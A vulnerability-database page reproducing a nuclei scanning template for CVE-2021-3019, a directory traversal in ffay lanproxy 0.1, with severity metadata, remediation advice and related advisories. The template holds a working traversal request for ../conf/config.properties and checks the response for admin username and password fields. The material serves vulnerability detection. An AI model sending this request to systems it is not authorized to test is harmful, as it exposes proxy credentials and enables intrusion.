Lucene search
K

ffay lanproxy Directory Traversal

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 57 Views

ffay lanproxy Directory Traversal vulnerability with high severity could lead to unauthorized access to sensitive files, data leakage, and remote code execution. Apply the latest patch or upgrade to a fixed version

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Lanproxy_Project Lanproxy
11 Jan 202104:18
githubexploit
GithubExploit
Exploit for Path Traversal in Lanproxy_Project Lanproxy
9 Jan 202107:11
githubexploit
GithubExploit
Exploit for Path Traversal in Lanproxy_Project Lanproxy
30 Aug 202309:41
githubexploit
GithubExploit
Exploit for Path Traversal in Lanproxy_Project Lanproxy
11 Mar 202107:40
githubexploit
ATTACKERKB
CVE-2021-3019
5 Jan 202105:15
attackerkb
Circl
CVE-2021-3019
17 Jan 202107:17
circl
CNNVD
Ffay Lanproxy Path Traversal Vulnerability
5 Jan 202100:00
cnnvd
Check Point Advisories
Ffay Lanproxy Directory Traversal (CVE-2021-3019)
15 Feb 202100:00
checkpoint_advisories
CVE
CVE-2021-3019
5 Jan 202104:35
cve
Cvelist
CVE-2021-3019
5 Jan 202104:35
cvelist
Rows per page
id: CVE-2021-3019

info:
  name: ffay lanproxy Directory Traversal
  author: pikpikcu
  severity: high
  description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Apply the latest patch or upgrade to a version that has fixed the vulnerability.
  reference:
    - https://github.com/ffay/lanproxy/commits/master
    - https://github.com/maybe-why-not/lanproxy/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3019
    - https://github.com/manas3c/CVE-POC
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-3019
    cwe-id: CWE-22
    epss-score: 0.18982
    epss-percentile: 0.96957
    cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lanproxy_project
    product: lanproxy
  tags: cve2021,cve,lanproxy,lfi,lanproxy_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/../conf/config.properties"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"
        condition: and

      - type: word
        part: body
        words:
          - "config.admin.username"
          - "config.admin.password"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022003ded73aa3ddea54149946d20693023ad7f316782b4d32cc230d262bb6f95d250220038021cb197db4fcd99264f5013b5a94559d8ee0e5e8f9feafb4750e1762e384:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.18982
57